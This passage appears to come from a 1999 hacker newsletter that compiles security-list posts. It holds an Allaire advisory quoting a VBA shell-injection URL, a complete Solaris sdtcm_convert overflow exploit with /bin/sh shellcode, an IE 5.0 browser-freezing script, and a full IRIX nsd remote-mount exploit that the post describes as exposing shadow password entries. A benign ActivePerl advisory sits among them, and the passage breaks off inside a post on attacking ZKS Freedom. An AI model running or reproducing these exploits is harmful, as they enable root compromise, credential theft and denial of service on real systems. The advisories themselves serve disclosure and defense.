  4355.       
  4356.       Alan
  4357.       
  4358.       @HWA                   
  4359.       
  4360.       
  4361.  20.0 New Allaire Security Bulletin (ASB99-09)
  4362.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4363.       
  4364.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml    
  4365.  
  4366.       Date: Tue, 1 Jun 1999 11:45:35 -0700
  4367.       From: aleph1@UNDERGROUND.ORG
  4368.       To: BUGTRAQ@netspace.org
  4369.       Subject: New Allaire Security Bulletin (ASB99-09)
  4370.       
  4371.       Dear Allaire Customer --
  4372.       
  4373.       We have recently become aware of a serious security vulnerability that may affect
  4374.       customers using Microsoft Access with ColdFusion. This issue is not a problem with
  4375.       ColdFusion, but can occur when using some versions of the Microsoft Access ODBC driver.
  4376.       
  4377.       We have created a new Allaire Security Bulletin that documents this issue and the steps
  4378.       that customers can take to protect themselves. If you are using Microsoft Access with
  4379.       your Web applications we strongly recommend that you review this new bulletin:
  4380.       
  4381.               ASB99-09: Solutions to Issues that Allow Users to Execute Commands through
  4382.               Microsoft Access
  4383.       
  4384.       You can find this new bulletin and information about other security issues in the
  4385.       Allaire Security Zone:
  4386.       
  4387.               http://www.allaire.com/security
  4388.       
  4389.       As a Web application platform vendor, one of our highest concerns is the security
  4390.       of the systems our customers deploy. We understand how important security is to
  4391.       our customers, and we're committed to providing the technology and information customers
  4392.       need to build secure Web applications. Allaire has set up an email address that customers
  4393.       can use to report security issues associated with an Allaire product: secure@allaire.com.
  4394.       
  4395.       Thank you for your time and consideration on this issue.
  4396.       
  4397.       -- Allaire Security Response Team
  4398.       
  4399.       ----------------------------------------------------------------------------------------
  4400.       
  4401.       <http://www.allaire.com/handlers/index.cfm?ID=11069&Method=Full>
  4402.       
  4403.       Allaire Security Bulletin (ASB99-09)
  4404.       
  4405.       Solutions to Issues that Allow Users to Execute Commands through Microsoft Access 
  4406.       
  4407.       Originally Posted: June 1, 1999 
  4408.       Last Updated: June 1, 1999 
  4409.       
  4410.       Summary 
  4411.       Some Microsoft ODBC drivers for Microsoft Access may allow users to execute Visual Basic
  4412.       for Applications (VBA) commands on the hosted server without permission. URL, form and
  4413.       cookie variables in a dynamic query in many development environments (e.g. ColdFusion, ASP,
  4414.       CGI, etc.) can be used to exploit this hole appending malicious VBA statements to existing
  4415.       queries. This problem can be easily fixed by upgrading to the Microsoft ODBC driver for Access
  4416.       included in MDAC 2.1 sp1a, available from Microsoft. In general, Allaire recommends that
  4417.       customers use proper coding methods for validating dynamic query variables passed on URL
  4418.       strings, http forms or cookies. This is not a security issue with ColdFusion itself. However,
  4419.       ColdFusion customers using Access are vulnerable to this issue. (This issue is similar to the
  4420.       vulnerabilities documented in ASB99-04, which are associated with appending malicious SQL
  4421.       statements to query strings sent to some enterprise databases.) 
  4422.       
  4423.       Issue 
  4424.       In a Web application there are often circumstances where queries are built dynamically using
  4425.       variables that are passed on URLs or in forms. Some versions of the Microsoft Access ODBC
  4426.       driver support the ability to append VBA commands to a SQL string. As a result, a malicious
  4427.       attack could be made by using URL, form or cookie variables to send VBA commands through a
  4428.       query. These VBA commands could potentially be used to damage the server or to gain
  4429.       unauthorized access to information and systems. (The potential for a similar problem using SQL
  4430.       statements and some enterprise database was documented in ASB99-04). 
  4431.       
  4432.       Some versions of the Microsoft Access ODBC driver allow for appending VBA commands to a
  4433.       SQL string. The VBA commands are appended by using the pipe character, or Chr(124), which
  4434.       is treated as a reserved character by the Access ODBC driver. See the following MS
  4435.       Knowledge Base article for details: 
  4436.       http://support.microsoft.com/support/kb/articles/q147/6/87.asp 
  4437.       
  4438.       This reserved character allows users to modify a URL, form or cookie variable to execute VBA
  4439.       commands against the Web server using the ODBC driver. The following string is an example
  4440.       of one that can be used to initiate an attack by writing a file to the web serverÆs hard drive: 
  4441.       
  4442.               '|shell("cmd /c 1 > c:\temp\foo.txt")|'
  4443.       
  4444.       This string could be passed to an application using a URL variable, so the page could be called
  4445.       as follows: 
  4446.       
  4447.               http://myserver/page.cfm?x='|shell("cmd /c 1 > c:\temp\foo.txt")|'
  4448.       
  4449.       This code, when executed as part of the following dynamically created query, will cause a file to
  4450.       be created at the location c:\temp\foo.txt. 
  4451.       
  4452.               <CFQUERY name="getUsers2" DATASOURCE="test1">
  4453.                       SELECT  * 
  4454.                       FROM    USERS
  4455.                       WHERE   lname = '#URL.X#'
  4456.               </CFQUERY>
  4457.       
  4458.       This code could also be vulnerable when processing form input from a template using a form
  4459.       variable called 'X'. Please note that you should always validate user-initiated input, including
  4460.       URL, form, and cookie variables. 
  4461.       
  4462.       Affected Software Versions 
  4463.       
  4464.              ColdFusion Server (all versions and editions) running with Microsoft Access through
  4465.              ODBC 
  4466.       
  4467.       What Allaire is Doing 
  4468.       This issue is not a problem with ColdFusion, but can occur when using Microsoft Access and
  4469.       some versions for the Access ODBC driver. It is not a problem with ColdFusion, but it can
  4470.       affect ColdFusion applications that use Access. To respond to this issue, Allaire has published
  4471.       an Allaire Security Bulletin (ASB99-09) notifying customers of the problem and remedies that
  4472.       can be used to address it. We have sent a notification of the bulletin to customers who have
  4473.       subscribed to Allaire Security Notifications. 
  4474.       
  4475.       What Customers Should Do 
  4476.       This issue appears to be fixed by the installation of the Microsoft Access ODBC driver included
  4477.       with MDAC 2.1 sp1a. We strongly recommend that customers install this ODBC driver. It
  4478.       should not adversely affect the functionality of ColdFusion applications using Access. This
  4479.       MDAC can be downloaded from the Microsoft site: 
  4480.       
  4481.       http://download.microsoft.com/msdownload/mdac/sp1a/x86/en/mdac_typ.exe 
  4482.       
  4483.       In addition, Allaire recommends that customers write their code to validate variables that are
  4484.       passed into SQL statements, configure their database security properly, and use standard
  4485.       database application development practices such as stored procedures where appropriate to
  4486.       protect themselves. These are general requirements of production applications regardless of the
  4487.       development platform. 
  4488.       
  4489.       There are many ways to address the issues raised by the risk of malicious SQL statements being
  4490.       inserted into dynamic queries. The Allaire Technical Brief û Securing Databases for ColdFusion
  4491.       Applications, details some of the steps you can take to secure your databases. 
  4492.       
  4493.       It is important to note that each individual application may require its own particular steps in
  4494.       both coding and database configuration in order to be fully secured. Some of the techniques
  4495.       for securing database applications built with ColdFusion are detailed in the Allaire Technical Brief
  4496.       - Securing Databases for ColdFusion Applications. 
  4497.       
  4498.       Revisions 
  4499.       June 1, 1999 -- Bulletin first released. 
  4500.       
  4501.       Reporting Security Issues 
  4502.       Allaire is committed to addressing security issues and providing customers with the information
  4503.       on how they can protect themselves. If you identify what you believe may be a security issue
  4504.       with an Allaire product, please send an email to secure@allaire.com. We will work to
  4505.       appropriately address and communicate the issue. 
  4506.       
  4507.       Receiving Security Bulletins 
  4508.       When Allaire becomes aware of a security issue that we believe significantly affects our products
  4509.       or customers, we will notify customers when appropriate. Typically this notification will be in the
  4510.       form of a security bulletin explaining the issue and the response. Allaire customers who would
  4511.       like to receive notification of new security bulletins when they are released can sign up for our
  4512.       security notification service. 
  4513.       
  4514.       For additional information on security issues at Allaire, please visit:
  4515.       http://www.allaire.com/security 
  4516.       
  4517.       THE INFORMATION PROVIDED BY ALLAIRE IN THIS BULLETIN IS PROVIDED "AS IS"
  4518.       WITHOUT WARRANTY OF ANY KIND. ALLAIRE DISCLAIMS ALL WARRANTIES, EITHER
  4519.       EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
  4520.       FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL ALLAIRE CORPORATION
  4521.       OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT,
  4522.       INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL
  4523.       DAMAGES, EVEN IF ALLAIRE CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED
  4524.       OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE
  4525.       EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL
  4526.       DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. 
  4527.       
  4528.       @HWA     
  4529.       
  4530.  21.0 sdtcm_convert Overflow Exploits( for Intel Solaris 7)
  4531.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4532.       
  4533.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml    
  4534.  
  4535.  
  4536.        *=============================================================================
  4537.          sdtcm_convert Overflow Exploits( for Intel Solaris 7)
  4538.          The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
  4539.          Written by UNYUN (unewn4th@usa.net)
  4540.       
  4541.          [usage]
  4542.               % gcc ex_sdtcm_convert86.c (This example program)
  4543.               % a.out
  4544.               If no response, hit ctrl+c
  4545.               #
  4546.         =============================================================================
  4547.       */
  4548.       
  4549.       #define         ADJUST          1
  4550.       #define         OFFSET0         6268
  4551.       #define         OFFSET1         4400
  4552.       #define         LENGTH1         600
  4553.       #define         OFFSET2         5000
  4554.       #define         LENGTH2         3000
  4555.       #define         OFFSET3         6000
  4556.       
  4557.       #define NOP 0x90
  4558.       
  4559.       char exploit_code[] =
  4560.       "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
  4561.       "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
  4562.       "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
  4563.       "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
  4564.       "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
  4565.       "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
  4566.       "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
  4567.       "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
  4568.       "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
  4569.       "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
  4570.       
  4571.       unsigned long get_sp(void)
  4572.       {
  4573.        __asm__(" movl %esp,%eax ");
  4574.       }
  4575.       
  4576.       
  4577.       unsigned long ret_adr;
  4578.       int i;
  4579.       
  4580.       main()
  4581.       {
  4582.           static char x[11000];
  4583.       
  4584.           putenv("LANG=");
  4585.           memset(x,'a',10000);
  4586.           ret_adr=get_sp()-OFFSET0;
  4587.           for (i = 0; i < 5000 ; i+=4){
  4588.               x[i+0]=ret_adr & 0xff;
  4589.               x[i+1]=(ret_adr >> 8 ) &0xff;
  4590.               x[i+2]=(ret_adr >> 16 ) &0xff;
  4591.               x[i+3]=(ret_adr >> 24 ) &0xff;
  4592.           }
  4593.           ret_adr=get_sp()-11700;
  4594.           if ((ret_adr & 0xff )==0) ret_adr+=4;
  4595.           printf("Jumping Address = %lx\n",ret_adr);
  4596.           for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
  4597.               x[i+0]=ret_adr & 0xff;
  4598.               x[i+1]=(ret_adr >> 8 ) &0xff;
  4599.               x[i+2]=(ret_adr >> 16 ) &0xff;
  4600.               x[i+3]=(ret_adr >> 24 ) &0xff;
  4601.           }
  4602.           for (i = OFFSET2; i <OFFSET2+LENGTH2  ; i++) x[i]=90;
  4603.           for (i=0;i<strlen(exploit_code);i++) x[OFFSET3+ADJUST+i]=exploit_code[i];
  4604.           x[10000]=0;
  4605.           printf("\n\nIf you can not get prompt, please hit CTRL+C\n\n\n");
  4606.           execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0);
  4607.       }
  4608.       
  4609.       
  4610.       @HWA
  4611.  
  4612.  
  4613.  22.0 ActiveState Security Advisory
  4614.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4615.       
  4616.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml     
  4617.  
  4618.       Date: Mon, 31 May 1999 07:16:53 -0700
  4619.       From: Michael Smith <support@ACTIVESTATE.COM>
  4620.       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  4621.       Subject: ActiveState Security Advisory
  4622.       
  4623.       Problem
  4624.       --------
  4625.       
  4626.       PerlScript and Perl-ISAPI that come with ActivePerl 516 and earlier
  4627.       versions, inadequately check the length of path information sent to open().
  4628.        Due to limits on path and filename length in Windows, this can crash IIS
  4629.       if sufficiently large strings are provided as paths or filenames.
  4630.       
  4631.       
  4632.       
  4633.       Solution
  4634.       ---------
  4635.       
  4636.       This is fixed in ActivePerl 517
  4637.       
  4638.       
  4639.       
  4640.       Work Around
  4641.       ------------
  4642.       
  4643.       If you are unable to upgrade to ActivePerl 517 then all path information
  4644.       should be checked for sane lengths before being passed to open(). The
  4645.       maximum length of a path, including drive, directory and filename is 259
  4646.       characters.  The maximum length of the filename portion of a path is 255
  4647.       characters. The maximum length of the directory portion of a path is 255
  4648.       characters.
  4649.       
  4650.       example:
  4651.       
  4652.       $filename = substr $filename, 0, 255;
  4653.       open FOO, ">$filename";
  4654.       
  4655.       
  4656.       
  4657.       General Comments
  4658.       -----------------
  4659.       
  4660.       Care should be taken when accepting input from users, especially in a web
  4661.       context where users are untrusted and relatively anonymous.  When designing
  4662.       CGI scripts some thought should be given to checking user input for sane
  4663.       values.  Use of taint mode and warnings (-t and -w) are also highly
  4664.       recommended.
  4665.       
  4666.       The Activators.
  4667.       
  4668.       
  4669.       @HWA
  4670.  
  4671.  23.0 Exploit in Internet Explorer 5.0
  4672.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4673.       
  4674.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml     
  4675.       
  4676.       Date: Mon, 31 May 1999 16:18:02 GMT
  4677.       From: THR - <thr_@HOTMAIL.COM>
  4678.       To: BUGTRAQ@netspace.org
  4679.       Subject: Exploit in Internet Explorer 5.0
  4680.       
  4681.       Hi everyone!
  4682.       
  4683.       
  4684.       I have found a bug which will freeze Internet Explorer 5.0
  4685.       I know that there are *many* bugs that will crasch browsers
  4686.       but what makes this one special is the following:
  4687.       
  4688.       In IE 5.0 Microsoft has fixed the bugs from IE 4.0 that
  4689.       was based on infinit loops in JavaScript. If a JavaScript
  4690.       contains a loop which will cause IE 5.0 to run slowly
  4691.       or be unresponsive, the user will be warned and he/she will
  4692.       be prompted whether the JavaScript should be aborted or
  4693.       not. This exploit is a JavaScript which changes the bgColor in
  4694.       an infinit loop and when you open it you wont get a warning.
  4695.       The browser will just freeze!
  4696.       Get the source code here: http://members.xoom.com/thr_/my/color.txt
  4697.       
  4698.       
  4699.       //THR
  4700.                WWW: http://fly.to/unixhacking
  4701.       
  4702.       ---------------------------------------------------------------------
  4703.       
  4704.       <http://members.xoom.com/thr_/my/color.txt>
  4705.       
  4706.       24/5 1999
  4707.       
  4708.       This is a new exploit which affects Microsoft Internet Explorer 5.0.
  4709.       When you enter the html document below, IE will freeze and you have to 
  4710.       close it with ctrl + alt + del.
  4711.       
  4712.       //THR
  4713.               WWW:  http://fly.to/unixhacking
  4714.       
  4715.       
  4716.       -----------Cut here------color.htm--------Start---------
  4717.       
  4718.       <HTML>
  4719.       <BODY>
  4720.       <SCRIPT>
  4721.        
  4722.       var color = new Array;
  4723.       color[1] = "black";
  4724.       color[2] = "white";
  4725.       
  4726.       for(x = 0; x <3; x++)
  4727.       {
  4728.               document.bgColor = color[x]
  4729.               if(x == 2)
  4730.               {
  4731.                       x = 0;
  4732.               }               
  4733.       }
  4734.       
  4735.       
  4736.       </SCRIPT>
  4737.       </BODY>
  4738.       </HTML>
  4739.       
  4740.       -----------Cut here------color.htm--------End---------
  4741.       
  4742.       @HWA
  4743.  
  4744.  24.0 IRIX 6.5 nsd virtual filesystem vulnerability
  4745.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4746.       
  4747.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml      
  4748.  
  4749.  
  4750.       Date: Mon, 31 May 1999 03:56:37 -0400
  4751.       From: "Jefferson Ogata (JO317)" <ogata@POBOX.COM>
  4752.       To: BUGTRAQ@netspace.org
  4753.       Subject: IRIX 6.5 nsd virtual filesystem vulnerability
  4754.       
  4755.       I've been waiting since February for SGI to post an advisory about this.
  4756.       Enough.
  4757.       
  4758.       /******************************************************************************
  4759.       
  4760.       IRIX 6.5 nsd virtual filesystem exploit
  4761.       
  4762.       Author: Jefferson Ogata (JO317) <ogata@pobox.com>
  4763.       
  4764.       Please note that this program comes with NO WARRANTY WHATSOEVER. Your use
  4765.       of this program constitutes your complete acceptance of all liability for
  4766.       any damage or loss caused by the aforesaid use. It is provided to the
  4767.       network community solely to document the existence of a vulnerability
  4768.       in the security implementations of certain versions of IRIX, and may not
  4769.       be used for any illicit purpose. Many of the details of the bug this
  4770.       program exploits have been available to users of SGI's online support
  4771.       system since February 1999. The current revision of IRIX (6.5.3) corrects
  4772.       this bug, at least enough to stop this particular exploit, and I strongly
  4773.       encourage you to bring your systems up to date as quickly as possible.
  4774.       
  4775.       With IRIX 6.5, SGI has moved all name services, NIS services, and DNS
  4776.       lookups into a userland process called nsd, which exports the results of
  4777.       the queries it fields into a virtual filesystem. The virtual filesystem is
  4778.       normally mounted onto the directory /ns by the program /sbin/nsmount, which
  4779.       is invoked by nsd on startup. The nsd daemon itself is exporting the
  4780.       filesystem via NFS3 over a dynamically bound UDP port -- rather than a
  4781.       well-known or settable one -- typically in the 1024-1029 range. On a
  4782.       desktop system, 1024 is a good bet, since nsd is usually the first
  4783.       RPC/UDP service to be started.
  4784.       
  4785.       The NFS filesystem is not registered with mountd, so there is no way to
  4786.       query mountd for a mount filehandle. But because the NFS port is fairly
  4787.       easy to discover through port scanning, and because the mount filehandle
  4788.       nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd
  4789.       filesystem from a host anywhere on the Internet. nsd will serve an array
  4790.       of NFS requests to anyone. Furthermore, because the service's NFS port is
  4791.       bound dynamically, it is difficult to protect it with a firewall; it may
  4792.       change from one system start to another, or if the daemon is killed and
  4793.       restarted.
  4794.       
  4795.       This program can successfully mount the nsd-exported virtual filesystem
  4796.       >from a remote host onto a machine running IRIX 6.4 or higher. It makes use
  4797.       of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know
  4798.       what this flag does at the NFS protocol level, but it allows the client to
  4799.       ask the NFS server not to enforce certain permissions controls against the
  4800.       client. I don't know whether any other vendor NFS client systems support
  4801.       this flag. A clever person might write a userland NFS client that would
  4802.       accept an initial handle, NFS port, etc. as arguments.
  4803.       
  4804.       On an SGI with SGI C compiler, compile with:
  4805.       
  4806.           cc -o nsdadv nsdadv.c
  4807.       
  4808.       Run it this way:
  4809.       
  4810.           nsdadv /mnt sucker.example.com 1024
  4811.       
  4812.       with obvious substitutions.
  4813.       
  4814.       So what are the security implications of this? Well, at the very least, the
  4815.       nsd filesystem on an NIS server reveals the NIS domain name, and what maps
  4816.       it contains, as well as what classes are being used.
  4817.       
  4818.       By exploring the filesystem shortly after it has been mounted I have been
  4819.       able to retrieve data that should be hidden from me, including shadow
  4820.       password entries from a remote system's shadow file.
  4821.       
  4822.       Beyond retrieving keys and maps, you can also monitor the filesystem for
  4823.       changes. A great deal of information is leaked through the contents of the
  4824.       nsd filesystem. For example, if host A looks up a host B's IP address, a
  4825.       file named B will appear in the /.local/hosts.byname directory in A's nsd
  4826.       filesystem. The file's contents will be the IP address.
  4827.       
  4828.       By the way, though you be unable to chdir into a particular location in
  4829.       the nsd filesystem, you may yet succeed under slightly different
  4830.       conditions. Eventually you can do it. I'm not sure why or when, but nsd
  4831.       gets picky sometimes. Eventually it relents. Specifically, I've found that
  4832.       the entire nsd filesystem appears readable for a few seconds after it is
  4833.       initially mounted. If you can't look at something, unmount the filesystem,
  4834.       remount it, and try again immediately. It also seems that a stat() is
  4835.       sometimes required before a chdir(). Your mileage may vary, but keep
  4836.       trying. You may wish to write a script to mount the nsd filesystem, explore
  4837.       and take inventory of its contents, and unmount the filesystem quickly.
  4838.       
  4839.       Once you've chdir'd into a directory, it appears you can always read it,
  4840.       although you can't necessarily stat its contents. This suggests a strategy
  4841.       of spawning a group of processes each with its cwd set to a subdirectory of
  4842.       the nsd filesystem, in order to retain visibility on the entire filesystem.
  4843.       Each process would generate an inventory of its cwd, and then monitor it
  4844.       for changes. A Perl script could do this well.
  4845.       
  4846.       Another thing: it is possible to create an empty file in nsd's exported
  4847.       filesystem simply by stat()ing a nonexistent filename. This suggests a
  4848.       potential DoS by creating many files in a directory.
  4849.       
  4850.       Remember that the system keeps a local cache in /var/ns, so you may have
  4851.       to wait for cached entries on the target host to expire before you'll see
  4852.       them reappear in the virtual filesystem.
  4853.       
  4854.       For some fairly extensive info on the nsd implementation, take a look at:
  4855.       
  4856.           http://www.bitmover.com/lm/lamed_arch.html
  4857.       
  4858.       ******
  4859.       
  4860.       What got me into all this was that I found I could no longer run services
  4861.       chrooted if they required DNS. It took considerable effort to come up with
  4862.       a solution to this. This was a fundamental change from IRIX 6.4, and I know
  4863.       I'm not the only one who finds the nsd implementation to be a generally
  4864.       unpleasant direction, in part because it causes umount -t nfs to break
  4865.       system database services. I give SGI points for creativity -- in one sense,
  4866.       using NFS as a database access system is a very slick approach. But the
  4867.       database needs a security model, and the model needs to be implemented
  4868.       correctly. Neither of these needs appears to have been met.
  4869.       
  4870.       So how could SGI fix this?
  4871.       
  4872.       Without going back, SGI could at least make nsd respond only to queries
  4873.       >from localhost (see note below about IRIX 6.5.3). The problem here is that
  4874.       they actually intend to support remote mounts in later releases, in order
  4875.       to supplement or supplant other means of distribution. The web documents
  4876.       indicate this.
  4877.       
  4878.       They could create a well-randomized mount filehandle for the filesystem
  4879.       and pass that to nsmount. Then you couldn't remotely mount the filesystem
  4880.       without guessing the handle -- nontrivial with a 32-byte handle.
  4881.       
  4882.       At the very least, they should provide libraries of regular BIND resolver
  4883.       routines, file-based getpwent, etc. routines, so one could choose the
  4884.       resolution strategy at link time, perhaps by modifying the shared library
  4885.       path.
  4886.       
  4887.       ******
  4888.       
  4889.       With IRIX release 6.5.3, SGI appears to have fixed this problem, at least
  4890.       to some degree. The exploit does not appear to work as it does against
  4891.       6.5.2. Further testing is needed, and the behavior should be watched
  4892.       carefully in future versions of IRIX.
  4893.       
  4894.       ******************************************************************************/
  4895.       
  4896.       #include <stdio.h>
  4897.       #include <string.h>
  4898.       #include <malloc.h>
  4899.       #include <mntent.h>
  4900.       #include <sys/types.h>
  4901.       #include <rpc/types.h>
  4902.       #include <sys/fstyp.h>
  4903.       #include <sys/fsid.h>
  4904.       #include <sys/mount.h>
  4905.       #include <sys/fs/nfs.h>
  4906.       #include <sys/fs/nfs_clnt.h>
  4907.       #include <netinet/in.h>
  4908.       #include <netdb.h>
  4909.       #include <arpa/inet.h>
  4910.       
  4911.       /* Filesystem type name for nsd-exported filesystem. */
  4912.       #define NSD_FSTYPE      "nfs3"
  4913.       
  4914.       /* File the records mounted filesystems. */
  4915.       #define MTAB_FILE       "/etc/mtab"
  4916.       
  4917.       /* Socket address we'll fill in with our destination IP and port. */
  4918.       struct sockaddr_in sin;
  4919.       
  4920.       /* All zero file handle. This appears to be the base handle for the nsd
  4921.          filesystem. Great security, huh? */
  4922.       unsigned char fh[NFS_FHSIZE] = { 0 };
  4923.       
  4924.       /* NFS mount options structure to pass to mount(2). The meanings of these
  4925.          are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The
  4926.          flags field indicates that this is a soft mount without log messages,
  4927.          and to set the initial timeout and number of retries from fields in
  4928.          this structure. The fh field is a pointer to the filehandle of the
  4929.          mount point, whose size is set by fh_len. As noted above, the mount
  4930.          point filehandle is just 32 zeroes. */
  4931.       struct nfs_args nx =
  4932.       {
  4933.           &sin,               /* addr */
  4934.           (fhandle_t *) fh,   /* fh */
  4935.           NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC,        /* flags */
  4936.           0,                  /* wsize */
  4937.           0,                  /* rsize */
  4938.           100,                /* timeo */
  4939.           2,                  /* retrans */
  4940.           0,                  /* hostname */
  4941.           0,                  /* acregmin */
  4942.           0,                  /* acregmax */
  4943.           0,                  /* acdirmin */
  4944.           0,                  /* acdirmax */
  4945.           0,                  /* symttl */
  4946.       
  4947.           { 0 },              /* base */
  4948.       
  4949.           0,                  /* namemax */
  4950.           NFS_FHSIZE,         /* fh_len */
  4951.           /* On IRIX 6.4 and up there are also the following... */
  4952.                               /* bdsauto */
  4953.                               /* bdswindow */
  4954.           /* On IRIX 6.5 there are also the following... */
  4955.                               /* bdsbuflen */
  4956.                               /* pid */
  4957.                               /* maxthreads */
  4958.       };
  4959.       
  4960.       void usage (void)
  4961.       {
  4962.           fprintf (stderr, "usage: nsmount_remote directory host port\n\n");
  4963.           fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on <host> via NSD daemon\n");
  4964.           fprintf (stderr, "port <port> onto <directory>.\n\n");
  4965.           exit (1);
  4966.       }
  4967.       
  4968.       int main (int argc, char **argv)
  4969.       {
  4970.           char                *dir;
  4971.           char                *host;
  4972.           char                *ports;
  4973.           int                 port;
  4974.           struct hostent      *h;
  4975.           int                 fstype;
  4976.           FILE                *mtabf;
  4977.           struct mntent       mnt =
  4978.           {
  4979.               0,
  4980.               0,
  4981.               NSD_FSTYPE,
  4982.               "soft,timeo=100,retrans=2",
  4983.               0,
  4984.               0,
  4985.           };
  4986.       
  4987.           if (argc != 4)
  4988.               usage ();
  4989.       
  4990.           dir = argv[1];
  4991.           host = argv[2];
  4992.           port = atoi ((ports = argv[3]));
  4993.       
  4994.           /* Prepare for host lookup. */
  4995.           memset ((void *) &sin, 0, sizeof (sin));
  4996.           sin.sin_family = 2;
  4997.           sin.sin_port = port;
  4998.       
  4999.           /* Look up the host. */
  5000.           if (inet_aton (host, &sin.sin_addr))
  5001.               ;
  5002.           else if ((h = gethostbyname (host)))
  5003.           {
  5004.               unsigned long   *l = (unsigned long *) *(h->h_addr_list);
  5005.               sin.sin_addr.s_addr = l[0];
  5006.           }
  5007.           else
  5008.           {
  5009.               fprintf (stderr, "Cannot resolve host %s.\n", host);
  5010.               return 1;
  5011.           }
  5012.       
  5013.           /* Get filesystem type index for nsd filesystem type. */
  5014.           if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
  5015.           {
  5016.               perror ("sysfs (" NSD_FSTYPE ")");
  5017.               return 1;
  5018.           }
  5019.       
  5020.           fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
  5021.               host, inet_ntoa (sin.sin_addr), port, dir);
  5022.       
  5023.           /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR
  5024.              means "tell server to trust us with attributes" and MS_DATA means
  5025.              "6-argument mount".
  5026.       
  5027.              MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't
  5028.              seem to work without this option. So even though this program will
  5029.              compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
  5030.              attack nsd. */
  5031.           if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx))
  5032.               != 0)
  5033.           {
  5034.               perror ("mount");
  5035.               return 1;
  5036.           }
  5037.       
  5038.           /* Record mount point in /etc/mtab. */
  5039.           mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1);
  5040.           sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
  5041.           mnt.mnt_dir = dir;
  5042.           if (!(mtabf = setmntent (MTAB_FILE, "r+")))
  5043.           {
  5044.               perror ("setmntent");
  5045.               return 1;
  5046.           }
  5047.           if (addmntent (mtabf, &mnt) < 0)
  5048.           {
  5049.               perror ("addmntent");
  5050.               return 1;
  5051.           }
  5052.           if (endmntent (mtabf) < 0)
  5053.           {
  5054.               perror ("endmntent");
  5055.               return 1;
  5056.           }
  5057.       
  5058.           return 0;
  5059.       }
  5060.       
  5061.       
  5062.       @HWA
  5063.       
  5064.  25.0 a practical attack against ZKS Freedom
  5065.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  5066.       
  5067.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml      
  5068.       
  5069.        
  5070.       Date: Sat, 29 May 1999 15:30:24 -0700
  5071.       From: Wei Dai <weidai@eskimo.com>
  5072.       To: cypherpunks@toad.com, coderpunks@toad.com
  5073.       Subject: a practical attack against ZKS Freedom
  5074.       
  5075.       Although the ZKS Freedom AIP protocol (as described in version 1.0 of the
  5076.       ZKS whitepaper) is conceptually similar to the PipeNet protocol, there are
  5077.       several attacks against ZKS which PipeNet is not susceptible to. The
  5078.       reason is that PipeNet uses end-to-end traffic padding, whereas ZKS only
  5079.       uses link padding. I came up with several attacks against link padding
  5080.       systems while developing PipeNet, which is why I ultimately choose
  5081.       end-to-end padding. However one can argue that end-to-end padding is too
  5082.       costly, and that these attacks are not practical because they require a
  5083.       global observer or the cooperation of one or more of the anonymous router
  5084.       (AIP) operators. ZKS has not publicly made this argument, but since they
  5085.       are probably aware of these earlier attacks they must have followed its
  5086.       reasoning.
  5087.       
  5088.       I hope the practicality of the new attack presented here will change their
  5089.       mind. In this attack, a user creates an anonymous route from himself
